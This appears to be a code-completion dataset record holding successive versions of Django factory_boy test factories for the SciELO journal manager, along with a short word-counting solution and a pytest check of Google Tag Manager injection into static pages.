"step-2": "<mask token>\n\n\nclass GroupFactory(factory.Factory):\n <mask token>\n <mask token>\n\n\nclass SubjectCategoryFactory(factory.Factory):\n FACTORY_FOR = models.SubjectCategory\n term = 'Acoustics'\n\n\nclass StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n study_area = 'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n )\n email = 'fapesp@scielo.org'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'fapesp@scielo.org'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'\n )\n editor_email = u'cbcd@cbcd.org.br'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n",
"step-3": "<mask token>\n\n\nclass UserFactory(factory.Factory):\n <mask token>\n\n @classmethod\n def _setup_next_sequence(cls):\n try:\n return cls._associated_class.objects.values_list('id', flat=True\n ).order_by('-id')[0] + 1\n except IndexError:\n return 0\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass GroupFactory(factory.Factory):\n FACTORY_FOR = Group\n name = factory.Sequence(lambda n: 'Group #%s' % n)\n\n\nclass SubjectCategoryFactory(factory.Factory):\n FACTORY_FOR = models.SubjectCategory\n term = 'Acoustics'\n\n\nclass StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n study_area = 'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n )\n email = 'fapesp@scielo.org'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'fapesp@scielo.org'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'\n )\n editor_email = u'cbcd@cbcd.org.br'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n",
"step-4": "<mask token>\n_HERE = os.path.dirname(os.path.abspath(__file__))\nwith open(os.path.join(_HERE, 'xml_samples', '0034-8910-rsp-48-2-0216.xml')\n ) as xml_file:\n SAMPLE_XML = xml_file.read()\nSAMPLE_TIFF_IMAGE = open(os.path.join(_HERE, 'image_test',\n 'sample_tif_image.tif'))\nwith open(os.path.join(_HERE, 'xml_samples',\n '0034-8910-rsp-48-2-0216_related.xml')) as xml_file:\n SAMPLE_XML_RELATED = xml_file.read()\n\n\nclass UserFactory(factory.Factory):\n FACTORY_FOR = models.User\n\n @classmethod\n def _setup_next_sequence(cls):\n try:\n return cls._associated_class.objects.values_list('id', flat=True\n ).order_by('-id')[0] + 1\n except IndexError:\n return 0\n username = factory.Sequence(lambda n: 'jmanager_username%s' % n)\n first_name = factory.Sequence(lambda n: 'jmanager_first_name%s' % n)\n last_name = factory.Sequence(lambda n: 'jmanager_last_name%s' % n)\n email = factory.Sequence(lambda n: 'jmanager_email%s@example.com' % n)\n password = 'sha1$caffc$30d78063d8f2a5725f60bae2aca64e48804272c3'\n is_staff = False\n is_active = True\n is_superuser = False\n last_login = datetime.datetime(2000, 1, 1)\n date_joined = datetime.datetime(1999, 1, 1)\n\n\nclass GroupFactory(factory.Factory):\n FACTORY_FOR = Group\n name = factory.Sequence(lambda n: 'Group #%s' % n)\n\n\nclass SubjectCategoryFactory(factory.Factory):\n FACTORY_FOR = models.SubjectCategory\n term = 'Acoustics'\n\n\nclass StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n study_area = 'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n )\n email = 'fapesp@scielo.org'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'fapesp@scielo.org'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'\n )\n editor_email = u'cbcd@cbcd.org.br'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n",
"step-5": "# coding: utf-8\nimport os\n\nimport factory\nimport datetime\n\nfrom journalmanager import models\nfrom django.contrib.auth.models import Group\nfrom django.core.files.base import File\n\n\n_HERE = os.path.dirname(os.path.abspath(__file__))\n\n\nwith open(os.path.join(_HERE, 'xml_samples', '0034-8910-rsp-48-2-0216.xml')) as xml_file:\n SAMPLE_XML = xml_file.read()\n\n\nSAMPLE_TIFF_IMAGE = open(\n os.path.join(_HERE, 'image_test', 'sample_tif_image.tif'))\n\n\nwith open(os.path.join(_HERE, 'xml_samples', '0034-8910-rsp-48-2-0216_related.xml')) as xml_file:\n SAMPLE_XML_RELATED = xml_file.read()\n\n\nclass UserFactory(factory.Factory):\n FACTORY_FOR = models.User\n\n @classmethod\n def _setup_next_sequence(cls):\n try:\n return cls._associated_class.objects.values_list(\n 'id', flat=True).order_by('-id')[0] + 1\n except IndexError:\n return 0\n\n username = factory.Sequence(lambda n: \"jmanager_username%s\" % n)\n first_name = factory.Sequence(lambda n: \"jmanager_first_name%s\" % n)\n last_name = factory.Sequence(lambda n: \"jmanager_last_name%s\" % n)\n email = factory.Sequence(lambda n: \"jmanager_email%s@example.com\" % n)\n password = 'sha1$caffc$30d78063d8f2a5725f60bae2aca64e48804272c3'\n is_staff = False\n is_active = True\n is_superuser = False\n last_login = datetime.datetime(2000, 1, 1)\n date_joined = datetime.datetime(1999, 1, 1)\n\n\nclass GroupFactory(factory.Factory):\n FACTORY_FOR = Group\n\n name = factory.Sequence(lambda n: \"Group #%s\" % n)\n\n\nclass SubjectCategoryFactory(factory.Factory):\n FACTORY_FOR = models.SubjectCategory\n\n term = 'Acoustics'\n\n\nclass StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n\n study_area = 'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = u'Av. Professor Lineu Prestes, 338 Cidade Universitária \\\n Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n email = 'fapesp@scielo.org'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'fapesp@scielo.org'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\".strip()\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'\n editor_email = u'cbcd@cbcd.org.br'\n\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n\n title = u'Artigos Originais'\n\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(\n lambda n: 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n\n\n",
"step-ids": [
22,
39,
42,
45,
47
]
}
|
[
22,
39,
42,
45,
47
] |
class Solution:
def uncommonFromSentences(self, A: str, B: str) ->List[str]:
word_count = {}
A = A.split()
B = B.split()
whole = A + B
for word in whole:
if word not in word_count:
word_count[word] = 1
else:
word_count[word] += 1
return [word for word in word_count if word_count[word] == 1]
|
normal
|
{
"blob_id": "09420360ddcf2f74c2e130b4e09ae2a959e42e50",
"index": 8305,
"step-1": "<mask token>\n",
"step-2": "class Solution:\n <mask token>\n",
"step-3": "class Solution:\n\n def uncommonFromSentences(self, A: str, B: str) ->List[str]:\n word_count = {}\n A = A.split()\n B = B.split()\n whole = A + B\n for word in whole:\n if word not in word_count:\n word_count[word] = 1\n else:\n word_count[word] += 1\n return [word for word in word_count if word_count[word] == 1]\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
# -*- coding: utf-8 -*-
"""Test(s) for static files
:copyright: Copyright (c) 2019 RadiaSoft LLC. All Rights Reserved.
:license: http://www.apache.org/licenses/LICENSE-2.0.html
"""
from __future__ import absolute_import, division, print_function
import pytest
import os
_TEST_ID = '__NO_SUCH_STRING_IN_PAGE__'
def setup_module(module):
os.environ.update(
SIREPO_SERVER_GOOGLE_TAG_MANAGER_ID=_TEST_ID,
)
def test_injection(fc):
from pykern import pkcompat, pkunit
from pykern.pkdebug import pkdc, pkdp, pkdlog
from pykern.pkunit import pkeq, pkok, pkre
import re
# test non-static page
r = fc.get('myapp')
pkok(
not re.search(
r'googletag',
pkcompat.from_bytes(r.data)
),
'Unexpected injection of googletag data={}',
r.data
)
# test successful injection
r = fc.get('/en/landing.html')
pkre(_TEST_ID, pkcompat.from_bytes(r.data))
|
normal
|
{
"blob_id": "65b5db0bc6f23c342138060b7a006ff61e2dcf45",
"index": 3761,
